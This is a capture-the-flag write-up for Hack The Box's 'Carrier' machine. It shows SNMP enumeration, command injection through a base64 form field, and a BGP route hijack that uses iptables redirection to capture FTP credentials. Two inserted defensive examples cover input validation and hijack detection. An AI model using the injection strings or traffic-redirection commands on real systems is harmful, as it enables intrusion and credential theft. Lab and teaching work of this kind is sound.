Hey guys, today Carrier retired and here is my write-up about it. User on this box wasn’t hard to get, but root is a different thing because we will go through some networking tricks and perform an attack called BGP hijacking. The overall experience was great and Carrier was one of the best boxes on this platform. It’s a Linux box and its IP is 10.10.10.105; I added it to my hosts file as carrier.htb. Let’s jump right in!
As always we will start by using nmap to scan for open ports and services.
nmap -sV -sT -sC carrier.htb
We get FTP on port 21, SSH on port 22 and HTTP on port 80. Some other boxes had anonymous FTP access allowed, but here it’s not allowed. The port is also filtered, so we are not going to check FTP.
HTTP Initial Enumeration
On HTTP there’s a web application called Lyghtspeed and we are asked to log in. Under “Please login” we see that it’s saying Error 45007 and Error 45009, which is interesting.
The next thing to check is subdirectory enumeration:
gobuster -u http://carrier.htb/ -w /usr/share/wordlists/dirb/common.txt -t 100 -to 200s
=====================================================
Gobuster v2.0.0 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://carrier.htb/
[+] Threads : 100
[+] Wordlist : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 3m20s
=====================================================
2019/03/15 11:50:56 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/css (Status: 301)
/debug (Status: 301)
/doc (Status: 301)
/fonts (Status: 301)
/img (Status: 301)
/index.php (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
/tools (Status: 301)
We will only check the interesting ones:
It has a PHP file called remote.php, and by checking it:
It says “License expired, exiting…”
There’s a PDF file and an image. The PDF file is called error_codes.pdf, so it might be helpful because we saw two errors on the login page earlier.
45007 is “License invalid or expired”
45009 is “System credentials have not been set. Default admin user password is set (see chassis serial number)”
So now we know that we need that serial number to be able to log in, but how do we get it?
At this point we may think that there are other services running on the box that we have missed. So before running a full TCP scan we will scan UDP first.
nmap -sU carrier.htb
We get dhcps on port 67 and snmp on port 161. Let’s check SNMP.
SNMP stands for Simple Network Management Protocol. It’s an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior. You can read more about it here.
We will use a tool called snmpwalk. It’s an important tool in SNMP enumeration and can tell us a lot of useful information. Read about snmpwalk here.
snmpwalk -c public -v 1 carrier.htb
-c for community string, -v for version
We only get one result: STRING: "SN#NET_45JDX23". So is that the serial number? Let’s check:
admin : NET_45JDX23
And it worked.
Exploiting RCE and getting user
Dashboard, Tickets and Diagnostics are available, but Monitoring is disabled. Tickets are not important now, but we will need them later.
Diagnostics has a button saying verify status:
After clicking:
By looking at the source we find a hidden field called check; if we use Burp to intercept the requests we will find it there too. The value of check is the base64-encoded string “quagga”:
We can try to encode “root” and see what happens:
It gives us a different output:
We can confirm that we have remote code execution by trying something like “quagga && whoami && id”
And we see root. We can easily encode our reverse shell payload and get a reverse shell:
But did we really get root access?
Running ifconfig, we see that we are not on the actual host, which is 10.10.10.105; we are on a different one.
Anyway, we owned the user flag!
I also wrote a Python script to automate the process of getting a reverse shell; I’ll post it later. (Update: Here is the script)
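Seen from the application’s side, the flaw above is that the decoded value of check is trusted as part of a command. The following is an added example, not code from the box or from the original write-up, of how such a handler can decode the field strictly, accept only an allowlisted value and filter a process listing without a shell; the allowlist, the function names and the sample listing are assumptions made for the illustration.

```python
import base64

# Assumption: "quagga" is the only value the diagnostics page needs to look up.
ALLOWED_CHECKS = frozenset({"quagga"})

# Constructed sample of process-listing lines, standing in for real ps output.
SAMPLE_PS = [
    "quagga  1234  0.0  0.1  24500  2624 ?  Ss  10:00  0:00 zebra --daemon",
    "quagga  1240  0.0  0.2  29444  3700 ?  Ss  10:00  0:00 bgpd --daemon",
    "root    1300  0.0  0.1  15000  1800 ?  Ss  10:00  0:00 cron -f",
]


class RejectedCheck(ValueError):
    """The submitted check value must not be processed."""


def decode_check(field):
    """Decode the hidden field; accept it only if it is on the allowlist."""
    try:
        # validate=True rejects characters outside the base64 alphabet;
        # binascii.Error and UnicodeDecodeError are both ValueError subclasses.
        value = base64.b64decode(field, validate=True).decode("ascii")
    except ValueError as exc:
        raise RejectedCheck("check is not valid base64 ASCII") from exc
    if value not in ALLOWED_CHECKS:
        # "root", "quagga && whoami && id" and everything else stop here.
        raise RejectedCheck("check value not allowed: %r" % value)
    return value


def verify_status(field, ps_lines=SAMPLE_PS):
    """Return matching process lines; the value never reaches a shell."""
    try:
        name = decode_check(field)
    except RejectedCheck:
        return []
    # Match on the user column in-process instead of building a command string.
    return [line for line in ps_lines if line.split()[0] == name]


if __name__ == "__main__":
    for text in ("quagga", "root", "quagga && whoami && id"):
        field = base64.b64encode(text.encode()).decode()
        print(text, "->", verify_status(field))
```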
BGP Hijacking and getting root
We saw “quagga” mentioned in the diagnostics page, but what is Quagga?
Basically, Quagga is routing software, and since Quagga is installed on this host, most likely we are going to perform BGP hijacking (route hijacking). I won’t go through a detailed explanation of this attack because that would be off-topic, but I will include some resources. In simple words, we are going to hijack another network’s prefixes and announce them so that they point to us, so anybody who tries to connect to that network will connect to us instead. This is possible because we are on the host that is responsible for routing.
Read about Quagga
BGP Hijacking (Wikipedia)
BGP Hijacking (internetsociety.org)
BGP Hijacking (blogs.akamai.com)
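From the monitoring side, a hijacked prefix shows up as an announcement that does not match what the network owner expects. The following is an added example, not part of the original write-up, of a check over observed announcements that goes slightly beyond the case on this page by flagging two anomalies: an unexpected origin AS for a protected prefix, and a longer prefix announced inside it. The prefix is the one quoted from the ticket on this page; the AS numbers, the sample updates and the function names are constructed for the illustration.

```python
import ipaddress

# Assumption: the prefix comes from the ticket quoted on this page; the AS
# numbers are constructed, taken from the documentation range 64496-64511.
EXPECTED_ORIGINS = {ipaddress.ip_network("10.120.15.0/24"): 64500}

# Constructed sample of (announced prefix, AS path) pairs seen by a monitor.
SAMPLE_UPDATES = [
    ("10.120.15.0/24", [64501, 64500]),   # expected origin
    ("10.120.15.0/25", [64501]),          # longer prefix inside the range
    ("10.120.15.0/24", [64502]),          # same prefix, different origin
    ("10.99.0.0/16", [64501]),            # unrelated prefix
]


def classify(prefix_text, as_path, expected=EXPECTED_ORIGINS):
    """Return (finding, protected_prefix, origin_as) or None for one update."""
    prefix = ipaddress.ip_network(prefix_text)
    origin = as_path[-1]  # the origin AS is the last entry of the AS path
    for protected, owner in expected.items():
        if prefix.version != protected.version:
            continue
        if prefix == protected:
            if origin != owner:
                return ("origin-mismatch", str(protected), origin)
        elif prefix.subnet_of(protected):
            # Longest-prefix match prefers this route over the protected one,
            # so it is reported even when the origin AS looks familiar.
            return ("more-specific", str(protected), origin)
    return None


def scan(updates, expected=EXPECTED_ORIGINS):
    """Classify every update and keep only the ones that need attention."""
    findings = []
    for prefix_text, as_path in updates:
        result = classify(prefix_text, as_path, expected)
        if result is not None:
            findings.append((prefix_text,) + result)
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_UPDATES):
        print(finding)
```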
If we take a look at the tickets again, ticket number 6:
We will notice this line: “one of their VIP is having issues connecting by FTP to an important server in the 10.120.15.0/24 network”. So on 10.120.15.0 there’s an FTP server and someone is accessing it regularly. On GitHub there’s a Python script called fake_ftp which creates an FTP server that steals credentials. We can try it locally with
Now everything is ready: we just need to hijack 10.120.15.0 and then run that fake FTP on the host, and we will be able to steal credentials. But the script is written in Python 2.7 and this host has only Python 3 installed:
We can fake an FTP server with nc or edit the script to work with Python 3, but we will do something different: we will edit iptables rules to route traffic from port 21 on the host to port 21 on our box. So what will finally happen is:
Someone tries to connect to the FTP server -> connects to the router instead of the server -> iptables routes that traffic to our box -> our fake FTP server steals the credentials
In order to perform our attack we will edit
After edits:
The only difference is this line
Now we will run a simple Python HTTP server to host the new bgpd.conf:
python -m SimpleHTTPServer 80
Then we will delete the old one, download the new conf, edit the iptables rules and finally restart the service:
iptables commands:
iptables -t nat -A PREROUTING -p tcp --dport 21 -j DNAT --to-destination 10.10.xx.xx:21
iptables -t nat -A POSTROUTING -j MASQUERADE
Then we will wait for someone to access the fake FTP server.
watch cat log.txt will run cat log.txt and refresh it every 2 seconds (log.txt is where the captured credentials are stored):
Finally we get these credentials:
Now we can SSH to the actual box as root:
And we owned root!
That’s it, feedback is appreciated!
Don’t forget to read the previous write-ups, tweet about the write-up if you liked it, and follow on Twitter for awesome resources: @Ahm3d_H3sham
Thanks for reading.